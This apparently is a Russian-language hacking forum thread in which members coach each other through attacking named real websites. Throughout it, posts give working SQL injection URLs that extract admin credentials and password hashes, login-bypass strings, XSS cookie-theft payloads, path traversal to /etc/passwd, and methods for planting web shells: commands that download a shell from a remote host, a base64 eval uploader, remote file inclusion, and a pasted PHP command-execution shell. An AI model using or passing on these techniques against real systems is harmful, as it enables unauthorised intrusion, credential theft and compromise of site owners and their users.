как отправить пост вместо гет?
воспользуйся http://gibs0n.name/tools/madpost.php

prozorov работает, на страницу вывелось henk
почитай мой пост на той странице.

спасибо, запрос выполняется, но данные не выводяться почему то:(

http://shlahter.ru/index.php?showfile=1&fid=7&p=downloads&area=1&categ=-1+union+select+1,concat_ws(pass,uname),3+from+kpro _user/*
дальше никак :(

У меня имеется сайт-файлообменник, при реге у тебя создаются на сайте папка site.com/upload/user/ в которую можно заливать все что угодно, например ссылка на залитый файл будет выглядеть site.com/upload/user/file.x. Я пытался залить файл shell.php, но при попытке пройти по ссылке upload/user/shell.php сервер предлагает его скачать как shell_php.htm т.е. он его переименовывает хотя ссылка на файл остается upload/user/shell.php и содеожимое файла "500 Internal Server Error", а если имя неверно, то выкидывает ошибку 404. Файловый архив самописный. Вопрос: Можно ли как-нибудь залить шелл?

prozorov, если хочешь - могу попробовать помочь - постучись мне в асю. В профиль загляни, она там в подписи.

QZAR-X, проверь на счет фильтрации. Попробуй залить html файл и посмотри добавит ли он html, попробуй phtml, txt ну разные вообщем и напиши результаты.

QZAR-X, проверь на счет фильтрации. Попробуй залить html файл и посмотри добавит ли он html, попробуй phtml, txt ну разные вообщем и напиши результаты.

html отфильтровал в file_html.txt
phtml так и оставил (file.phtml), но все равно предлагает его скачать.

мне кажется что скрипт испольщует ЧПУ, потому что залиышийся файл имеет ссылку site/download/mydir/file.x, а если нажать из меню на ссылку дириктории в которой лежит файл, то она будет уже site/dir/mydir/. И еще если к адресу приписывать site/dir/mydir/4343/4535/343/ (директории с цифрами не существуют), то сайт откроет(скорее всего делает вид что открыл) все эти папки но они будут пустыми.

Ну..значит грамотно настроено все. По-крайней мере я не вижу обходных путей вот так вот "удаленно" )

сиквил инъекция, встречаюсь не первый раз, но ничего не могу сделать, в помощь ипользовал ваши статьи. Может кто подскажет, что я делаю не правильно? Буду блпгодарен.
пример: http://www.ksu.ru/usvr/index.php?id=17&idm=-1'

"что я делаю не правильно", ну ты как я вижу поставил кавычку... что ты ещё делал? я не понимаю тебя ;)

почему на запрос group order и тд выдает тоже самое?

Fuckel
Наличие ошибки не всегда свидетельствует о наличии уязвимости, нужно проверять на возможность иньекции например так:
+and+1=1/*
+and+1=2/*
А вообще, именно этот ресурс уже задолбали, поищи на форуме и увидешь где и как иньекция проходит если интересно

ды нет, просто нужно всегда проверять на наличие открытых скобок вот так:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1)+and+(1=1

нет ошибки, значит как минимум 1 скобка открыта. теперь так:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1))+and+((1=1
ЭРРОР, значит 1 скобка открыта и её нужно закрыть.

А птоом подбираем:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11/*

потом по стандарту:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1)+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11/*

и видим:
5.0.26:uniksu:uniksu@localhost

Вот у меня такой вопрос:
есть некая страница в каталоге /agents/
которая требует обязательно ввести логин и пасс,
если не ошибаюсь по моим наблюдениям логин не фильтруется, но я незнаю ни одного логина, приблизительный запрос: select xxx from xx_table where login=$login and pass=$pass, логины типичные admin, administrator и т.п. не прокатывает,
вопрос: что можно в этих случаях сделать?

login=31337 or 1=1--
pass=qwerty

?

пробуй так, с кавычками, скобками тд.

login=31337 or 1=1--
pass=qwerty

?

пробуй так, с кавычками, скобками тд.
Вобще в данном случае я наверное это бы и посоветовал, но хочу сказать, что в некоторых случаях наличие пробела после -- обязательно, и я думаю если в скрипте подставляется кавычка, то это так и есть, вобщем все как блеки описал, но только в конце пробел

o3,14um
пасиба, про скобки я первый раз слышу. в след учту. спс.

login=31337 or 1=1--
pass=qwerty

Такое не прокатывать, т.е. мой запрос добавляется в
where login='reallogin' запрос /*,
мне надо знать хотя бы один реальный логин, а я незнаю,
как можно в таких случаях поступить, кроме перебора логинов, :(
очень надо.

Если есть иньекция, очень врядле. что те нужно знать логин.

ПРобуй ввести как в логин, так и в пароль:
' or 1=1/*
') or 1=1/*
')) or 1=1/*
') or ('1'='1
Вобўем сам эксперементіруй. И ещё многое зависит от того, какой серв БД там стоит!

можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc

можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
Да. Вот ссылка для примера.
http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,'%3CH1%3E%D0%92%D0%AB%D0%92%D0%9E %D0%94%D0%98%D0%9C%D0%AB%D0%99%20%D0%A2%D0%95%D0%9 A%D0%A1%D0%A2%3C/H1%3E',22/*

чет не то

т.е. это прокатит если знаешь кол-во столбцев, а если нет...

2 bag
Сформулируй вопрос яснее.Если ты имеешь ввиду как узнать есть ли инъекция при отключенных ошибках сервера то нужно почитать статьи т.к способов очень много и сдесь их все не изложишь Например эту:
_http://forum.antichat.ru/threadnav43966-1-10.html
Ну а вооще какой вопрос -такой ответ Dima-k17 написал тебе именно то ,что ты спросил

да я имею ввиду как узнать есть ли инъекция при отключенных ошибках сервера, статьи читал, я ищу более менее универсальный метод, вывод текста на страницу было бы самое то :)

Столкнулся с такой проблемкой, мб поможете... Начнем с начала:)
Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php
Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php
Начал подбирать кол-во полей:
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка
Исходя из этого сделал вывод что столбец у нас один.
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?

колличество то может быть и верное, а вот запрос неверный

очень возможно, что там подряд идет два запроса, отсюда , когда у тебя верен первый, второй возвращает ложь.

Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
select 1 фозвращает число ОДИН, а не первый столбец

http://viscali.com/shop/main_bigware_53.php?op=results&pollid=1+and+substring(version(),1,1)=3

мускул третий, нет юниона

Только учусь!
-----------------------
Подскажите, на что это я наткнулся и как это можно использовать?
http://tangocamp.org.ua/gallery?photo=2
http://tangocamp.org.ua/gallery?photo=2-1(или вообще любой текст)
вывод в номерах фоток
Я такого еще не встречал, подскажите.

Вот прошу)
http://tangocamp.org.ua/gallery?photo=%3Cscript%3Ewhile(1)alert()%3C/script%3E
можно это XSS, читай маны

http://viscali.com/shop/main_bigware_53.php?op=results&pollid=1+and+substring(version(),1,1)=3
мускул третий, нет юниона
Спс, вкурил:)

http://tangocamp.org.ua/gallery?photo=%22%3Cscript%3Ealert(document.cookie )%3C/script%3E
так проще

Спасибо! xss я видел, но подумал, что это еще одна ошибка и к той не имеет отношения. Я ж говорю, что не встречал еще такого, чтоб просто менялся текст без вывода какой либо ошибки

нашел sql inc не могу пробить
помогите
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=999999
уже все испробовал :(

bag врать нехорошо. читай маны и пробуй, там все самое элементарное.
сам не попробуешь - подсказок не будет)

ок,пробовал
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=1+group+by+1/* загрузилась
пробую
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=1+union+select+1/*
The used SELECT statements have a different number of columns

только эти два запроса? чтоже ты хотел ими сделать?

да не только ими, читаю мануалы,статьи,пока ничего не выходит:)

ну кто-нибудь может мне помочь? уже замучился :/

http://www.fevralka.ru/index.php?showlink=1&fid=8&p=links&area=1&categ=-2321+union+all+select+1,concat(email,0x203a3a20,pa ss),3+from+ляпоиск рулитля_user/*

единственное хеш нада брутить ;)

xcedz, спасибо канечно, но это я давно нашел, я хотел бы разобраться с
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=

народ может кто посмотрит? забадался

не хочется флудить, но меня тоже интересует решение этой задачи :
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=

Бы ло бы интересно увидеть какой тут должен быть запрос.

http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=2+and+ascii(lower(substring((select+version( )),1,1)))=0x35/*

т.е. посимвольный брут. ошибка после селекта может быть там во многих случаях. к примеру там идет два и более перекрестных запроса на данную переменную, имеющих различные кол-ва колонок

спасибо,есть над чем подумать:)

sql-inj или нет
http://www.sceleton.dom.raid.ru/index.php?act='
http://link.raid.ru/browse.php?cat=-5'
может быть отключён вывод ошибок но немогу подобрать кол-во таблиц

может кто посмотрит?

http://link.raid.ru/browse.php?cat=-1+union+select+version()/*

тоха респект тебе)

http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*

Forbidden
You don't have permission to access /browse.php on this server.

Хотя user(),database(),version() выполняются

http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*

Forbidden
You don't have permission to access /browse.php on this server.

Хотя user(),database(),version() выполняются

Ты че издеваешься? :D INFORMATION_SCHEMA ?

http://securityvulns.ru/Fnews675.html читай если нет (если да... то хм..)

тьфу блин тупею...

http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*

Forbidden
You don't have permission to access /browse.php on this server.

Хотя user(),database(),version() выполняются
Там мукул четвертый, information_schema там нет.
http://link.raid.ru/browse.php?cat=-1+union+select+table_name+from+information_schema. tables/*

http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=2+and+ascii(lower(substring((select+version( )),1,1)))=0x35/*
можно ли этим способом вывести строчку или какой нить символ чтобы можно было увидеть инъекцию?

Там мукул четвертый, скорее всего information_schema там нет.

гыгыгыг, ога, information_schema это такая непостоянная фигня, где заочет там и появляется, обычно она в пятой версии но иногда и в 4, хотя скорее всего там нет
пиздец!

2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи

jokester, спасибо за ответ, статьи читал, пишу скрипт, вывожу текст на страницу потом ищу его если есть то все ок, вот пытаюсь воткнуть как в этом методе это можно реализовать

2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи
не проще
and 5=substring(version(),1,1)
? =\

Здравствуйте, у меня два вопроса,
Первый - Пожскажите пожалуйста какую нибудь бажную CMS не сложную в установке, чтобы можно было поставить на localhost и отработать заливку шелла например.

Второе - я нашел уязвимый сайт и пытаюсь на нем прочесть файлы, путь до них беру из сообщения мускула об ошибке, но в место содержимого файла цифра за место каторой подставляю LOAD_FILE() просто не отбражается. Я уже и в hex кодировал, все равно не выводит файлы.

Сам сайт -
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE('/var/www/web7/web/show_videos.php'),3/* - так ошибка мускула
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE(0x2f7661722f7777772f 776562372f7765622f73686f775f766964656f732e706870), 3/* - так цифра не отображается

Там прав на чтение не хватает или что-то другое?

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...

Spaise
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,user(),2,3/*
web7_u1@localhost
нет прав на чтение

зато версия бд 5-ая
5.0.32-Debian_7etch1-log
можно раскрутить сам скуль..

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...
http://link.raid.ru/phpmyadmin/
login: localhost
Таблиц нет, я в этом не специалист, но раз мускул использует, значит все таки таблы есть. )

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...

через куки from не фильтруется составляй свой запрос в куках, ну скорее и в пост не фильтруется

http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
меняй лимит получиш таблицы..

http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
меняй лимит получиш таблицы..
Мне не нужны таблици, я спрашивал про чтение файлов.

Непойму в чом прикол.

id=1'union+select+1,2,3,4,5,COLUMN_NAME,database() ,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*
выводит нормально
а когда пытаюсь прочитать так:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+phpbb_users+limit+1,1/*

выводит:
'phpbb_users' doesn't exist

phpbb_users в другой бд

id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*

то что получится и будет бд, потом:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*

phpbb_users в другой бд

id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*

то что получится и будет бд, потом:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*
возвращает в первом запросе пустоту.
+ если беру на угад например:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+forum.phpbb_users/*
возвращает
SELECT command denied to user sdf'@'localhost' for table 'phpbb_users'

попробуй без limit:
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'/*

Попробуй так :
<?Govyuazhiy huy
"Ebitnya";
?HUY>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''phpbb_users''' at line 1

''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()

Обошол!(/*)
Спасибо всем кто помог, всем +5

''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()
ндя, нет там никакого экранирования, посмотри еще раз на ошибку, просто кавычка скриптом добавляется и все, т.е. надо отсекать ее с помощью комментов /*

Нашел скулю
--------------------------
Сеть аптечных магазинов!
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576


5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
----------------------------------
вывожу колонки? например с zdp_usr
http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,column_name,5+f rom+information_schema.columns+where+table_name+li ke+`zdp_usr`/*#s576
получаю
id
usr
pwd
type

как я понял экранирования кавычек нет
------------------------------------
но при попытке вывода колонок выплевует
звездочки-заместо текста и ошибку
Не могу получить перечень оборудования! The used SELECT statements have a different number of columns
------------------------------------
рас уж кавычки не фильтруются, значит как то можно залить шелл
я шеллы еще не заливал-буду рад примеру
------------------------------------

Звёздочки это аккаунт,вот админка
_http://www.zdorovie-plus.com/adm/login.php

З.Ы.Т.е. логин 5 звёздочек и пароль 5 звездочек :D

А шелл врятли, прав не хватит, если через скуль,а в админке я не лазил можешь посмотреть

по поводу аккаунта спасибо-сам бы не догадался, что звездочки-это вовсе не звездочки
а по поводу админки я уже нашел на http://madnet.name/tools/madss/
-------------------------------
а как насчет шелла?
-------------------------------
хотелось бы сделать копию сайта-для экспериментов на локалхосте(или взять где-то любую другую копию более менее "серьезного"сайта)
--------------------------------
в админке был-мне это ничего не дало
Я ж говорю: шеллы никогда еще не заливал, прошу помощи, потому что на примере учиться легче и понятней, чем на голой теории

Подскажите пожалуйста, как можно залить php шелл, на подобии r57shell, через залитый через инжекцию файл с содержанием - <?php system($cmd); ?>
:confused:

wget http://shell
curl
fetch
lynx
links
axel :d

смотря что есть на серваке

Подскажите пожалуйста, как можно залить php шелл, на подобии r57shell, через залитый через инжекцию файл с содержанием -
:confused:
Про команды в ОС почитать видимо религия не позволяет?:-)
Если *nix то так:
wget -o [что] [куда]
Если вин, то проще наверное с фтп скачать, хотя могу ошибаться.

если нет никаких качалок легче echo-нуть аплоуд скрипт в 1 строку ( echo '<?php+eval(base64_decode(тут_пхп_код_в_б эйсе));?>' >1.php ) в файл, и через нее уже залить

Скажите пожалуйста, здесь есть уязвимость?
http://www.beiks.com/palm/showtitle.asp?titleid=350'
MSSQL

есть, только это не MSSQL, а MS Access причем помогут скорее всего в этой скуле только подзапросы

Ребят, подскажите как сделать дамп базы данных mysql или доступ по ftp получить ? Имеются логин и пароль вида - u15364/6cb1963d2018c3ea полученные через скуль.

Как расшифровать пароль? Или как сделать дамп? Есть еще данные файла /etc/passwd...

Подскажите пожалуйста, как можно залить php шелл, на подобии r57shell, через залитый через инжекцию файл с содержанием -
:confused:

В unix системах (linux,*bsd,sunos) для скачивания файлов обычно используются качалки, всего их 5:
- wget
- curl
- fetch
- lynx
- links

Определить существует ли данная качалка можно командой which
[user@host] ~/tmp$ which wget
/usr/local/bin/wget

Пусть требуется скачать file.c с сайта site.ru в папку /tmp

- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c

Бывает что не одной из перечисленных качалок нет или не хватает прав для запуска :(
Тогда мы можем воспользоваться ftp =)
echo user password > /tmp/ftp
echo type binary >> /tmp/ftp
echo lcd /tmp >> /tmp/ftp
echo get file.c file.c >> /tmp/ftp
echo quit >> /tmp/ftp
ftp -n site.ru < /tmp/ftp

Win.
В форточках существует 2 вида скачивания файла:
- ftp
- tftp

Пусть требуется скачать file.exe с сайта ftp.site.ru
Сделаем это с помощь ftp сценария:

echo login > ftp.tmp
echo password >> ftp.tmp
echo get file.exe file.exe >> ftp.tmp
ftp -s:ftp.tmp ftp.site.ru

Tftp сервис является упрощённым ftp
Скачать сам сервер можно с офф сайта http://tftpd32.jounin.net
Скачивается файл командой:
tftp -i tftp_server_ip get file.exe
(с)

2 mff
6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro

(с)

2 mff
6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro

Спасибо! Эту програмку я давно знаю!

Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

Заранее всем спасибо!

Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

Заранее всем спасибо!
Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
Что тебе еще надо? :)

Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
Что тебе еще надо? :)

Спасиб, почитаю, сейчас перебираю при помощи PaswordsPro, но боюсь что это на долго...

а ССЫЛОЧКА отстой. Нету там ничего по mysql. И всё равно спасибо!

Spaise как вариант можно залить фаил с содержанием <? include($s) ?>
назовём его a.php к примеру тогда шелл подключается таким образом
http//site.com/a.php?s=http//sait2.com/фаил с шелом .php
в место include() можно использовать ещё и :
readfile()
fopen+fwrite+feof+fread
file_get_contents()
require()
не говоря уже про system('curl/get/fetch/lynx/etc')...

почему сразу <? include($s) ?>

а если register_globals off? а если url access disabled?)

mff,
_http://injection.rulezz.ru/ по ижекту почитай..

mff,
_http://injection.rulezz.ru/ по ижекту почитай..

Ага, спасибо, читаю там SQL инъекция в сервере MySQL, по этому руководству вобщемто и делаю, но вот не всё там понятно как то...

дак ты спрашивай что непонятно для этого и топик собственно..

непонятно ReVOLVeR что делать вот с этим: 6cb1963d2018c3ea
Как подобрать парольчик, это всё что мне нужно...
Тебе спасибо!

2 mff
Это mysql хэш, юзай прогу для брутфорса хэшей passwords pro, если не знаешь что такое хэш, иди сюда - http://forum.antichat.ru/forum76.html

Подскажите как правильно подобрать пароль к хэшу mysql при помощи PaswordsPro. Каким перебором лучше пользоваться? Может есть какието базы паролей?

0nep@t0p я ей и пользуюсь, атака полным перебором, но вот незнаю найдет он что нить? Подскажи, как правильно ей пользоваться. Она у меня все процессы сожрала...

blackybr ну тогда curl/get/fetch/lynx/etc
просто это уже было написано я дописал ещё способ))

Подскажите как залить шелл через админку в IpB v2.3.1

>> Подскажите как залить шелл через админку в IpB v2.3.1

Есть возможность запросов к бд?

Ребят вот такая конструкция - "id_rubric=9999+union+select+1,mysql.user.password, 3+from+mysql.user/*" не помогает, что делать?

Эта тоже непомогает - "id_rubric=9999+union+select+1,concat_ws(0x2F,user, password),3+from+mysql.user/*" :(

Прочитай хоть брошюрку по sql =\
select blablabla FROM mysql.user

во всех ипб остается заливка шелла
1) через евал в шаблонах
2) через "raw php..." ищите где )

Где можно скачать шелл для SMF1.1.4 для залития в админку?
вот тема про залития а шелл сам я ненашол((

http://forum.antichat.ru/thread43633.html

Ребят вот такая конструкция - "id_rubric=9999+union+select+1,mysql.user.password, 3+from+mysql.user/*" не помогает, что делать?

Эта тоже непомогает - "id_rubric=9999+union+select+1,concat_ws(0x2F,user, password),3+from+mysql.user/*" :(
Банально не хватает прав
Где можно скачать шелл для SMF1.1.4 для залития в админку?
вот тема про залития а шелл сам я ненашол((

http://forum.antichat.ru/thread43633.html
http://toxa.nov.ru/z.txt

Банально не хватает прав

http://toxa.nov.ru/z.txt


Жесть, а что то можно еще сделать?

Ребят поделитесь скриптами для облегчения работы со скулью. Поиск на форуме не помагает :(

Всем за ранее спасибо!

Ребят поделитесь скриптами для облегчения работы со скулью. Поиск на форуме не помагает :(

Всем за ранее спасибо!
http://toxa.nov.ru/sql.txt
Жесть, а что то можно еще сделать?
искать таблицы юзеров\админов например или пытаться залить шелл через into outfile

Учусь!
Украинский морской институт
http://www.umi.com.ua/?do=news&id=-77+union+select+1,concat_ws(0x3a,version(),databas e(),user())/*
---------------------------------------------------------
5.0.22-log:vnmamontov9_umi:umi@localhost
---------------------------------------------------------
доступ к information_schema.tables но там нету ничего интересного
есть форум, судя по исходникам smf
<script language="JavaScript" type="text/javascript"><!-- // --><![CDATA[
var smf_theme_url = "http://umi.com.ua/forum/Themes/babylon";
var smf_images_url = "http://umi.com.ua/forum/Themes/babylon/images";
var smf_scripturl = "http://umi.com.ua/forum/index.php?PHPSESSID=f5hg5bto4jkppsev38lj403l12&amp;";
var smf_iso_case_folding = false;
var smf_charset = "windows-1251";
// ]]></script>
но таблицы smf_members несуществует.
Очень интересно, есть ли вариант вытянуть что нибудь интересное или может я неправильно определил форум?
-----------------------------------------------------
http://www.housemarket.com.ua/catalog.html?id=3/**/union/**/select/**/1,2,3,4,5,6,7/*
тоже очень интересная-вывода вообще никакого нет, подскажите как быть в этом случае?(подзапросы?)
-----------------------------------------------------
http://kram.in.ua/article/19`
интересно
информативный вывод, но у меня все же ничего не получилось
-------------------------------------------------------
Всем, кто откликнется-СПАСИБО

2 samarin
бд с форумом тебе недоступна .
все таблцы те доступные
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
announcements
collective
course_price
group_collective
lib_new_receipts
lib_news
lib_receipts
lib_receipts_page
news
resources
resources_part
utc_news

во втором случае тебе надо найти хотя бы одну существующую таблицу, а дальше уже будет возможен посимвольный перебор, типа
http://www.housemarket.com.ua/catalog.html?id=3+and+if(substring(version(),1,1)= 5,(select+1+from+xxx),(select+1+from+xxx+limit+0,1 ))/*
Вместо xxx пишешь свою таблицу. При выполнении условия будет ошибка, при невыполнении - пустой лист.

2 samarin
бд с форумом тебе недоступна .
все таблцы те доступные
Я ж писал доступ к information_schema.tables но там нету ничего интересного
покрайней мере интересного я не нашел

В общем таскался по вашему форуму,что бы задать конктретные вопросы по xss уязвимостям,но нифига не нашел.Почитал статейки, и вот что меня интересует.
1.xss- это ведь не глупый перебор типа '><script>alert(document.cookie)</script>,или другие возможные варианты подставления в панель адреса?
2.где я могу найти подробный мануал по xss?все ссылки о xss я здесь просматрел
и гугль тоже юзаю.

народ, объясните пожалуйста почему столбцы показывает только при таком запросе
http://www.jushhome.com/AmMoviePort/links.asp?CatId=-99999+UNION+SELECT+1,2,3,4,5,6,7,8+from+users
а не как обычно
http://www.jushhome.com/AmMoviePort/links.asp?CatId=-99999+UNION+SELECT+1,2,3,4,5,6,7,8/*
ась? ;)

кто-нибудь гляньте меня интересует этот вопрос.

В общем таскался по вашему форуму,что бы задать конктретные вопросы по xss уязвимостям,но нифига не нашел.Почитал статейки, и вот что меня интересует.
1.xss- это ведь не глупый перебор типа '><script>alert(document.cookie)</script>,или другие возможные варианты подставления в панель адреса?
2.где я могу найти подробный мануал по xss?все ссылки о xss я здесь просматрел
и гугль тоже юзаю.
https://forum.antichat.ru/thread42326.html

все ссылки о xss я здесь просматрел
и гугль тоже юзаю.


http://ha.ckers.org/xss.html =\

Люди есть у кого словари под PasswordsPro для атаки MySQL хэшей, поделитесь, плис.
Или может кто посоветует другую программу для расшифровки вот такого хэша:6cb1963d2018c3ea

Буду очень признателен!
Спасибо!

возможные варианты подставления в панель адреса?

самео простое - вводи в поля ввода такую штуку: '">xss и смотри где код вышел за пределы ковычки. ДЛя активных ксс - <>><}{)(xss()'=" - смотри в исходнике что фильтруется а что нет

В разделе php инжекции нашел вот такой инжект -
http://www.bristolferry.com/page.php?xPage=../../../../../../../etc/passwd
Пытаюсь приконектится к серверу по SSH программой putty, login: root .
В putty логин ввести можно, а пароль даже не видно как вводит. Нажимаю Enter - пишет, что доступ закрыт. Подскажите пожалуйста, в чём проблема?
И еще, в passwd лежат пароли от пользователей?

Подскажите что делает эта инекция?
Пытались применить её к vBulletin.
//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif???
Содержимое странички _http://www.entgiftungspad.de/cache/cmd7.gif
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Spaise, в /etc/passwd пароли лежали в старых версиях ядер
Сейчас паролей там нет, а лежат они в /etc/shadow - если у тебя Линукс или Соларис, /etc/master.passwd - Если у тебя *BSD
Доступны они только руту

xaker-boss, вообше то это удалённый инклуд в компоненте Мамбо - com_mambowiki, хз как вы пытались его к Булке применить :D

Spyder да эт не я пытался, а меня пытались ламанут, просто загленул в свой ЛОГ и у видел там это.
Спасибо

Уважаемые господа. Не первый раз сталкиваюсь с такой бедой.
Запрос такого вида : ___http://site.com/lalala/download/download.cfm?companyid=lalala&fileid=lalala&filekey='
Ошибка такого вида :
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting from a character string to uniqueidentifier.

Вопрос: Что это такое. И где можно прочитать какое то описание, как правильно провести иньекцию.

С удовольствием выслушаю ваши советы.

P.S. И еще вопрос .
1. В MSSQL идет фильтрация на TOP и на From . если вместо TOP я могу еще поставить max то фром мне полюбому нужен.
Что можно сделать в этой ситуации?

constanta ошибка типа sql-inj
читаем тут http://injection.rulezz.ru/
попробуй закодировать фром

Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???

mff логины к ssh которые нередко подходят к фтп
узнать прова на сервере для определённого юзверя
используй для бруа к примеру на совпадение логина и пасса

Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???

оттуда можно узнать имена пользователей которые существуют в системе.

Спасибо вам ReVOLVeR zythar!

mff благодарность принимается ввиде +++++ к репе)

Я такого еще не встречал,может кто подскажет
при запросе, например:
http://www.stroyfarfor.com/catalog?c_dept_id=4&c_good_id=14+order+by+10000/*
выплевывает очень интересную ошибку
------------------------------------------------------
и такое, не первый раз встречаю
http://www.vera-tour.ru/event/show.phtml?show=`
что это может быть?

Здрасти.Извините я сильно новичок... .Вот нашол я в чате багу с Xss/
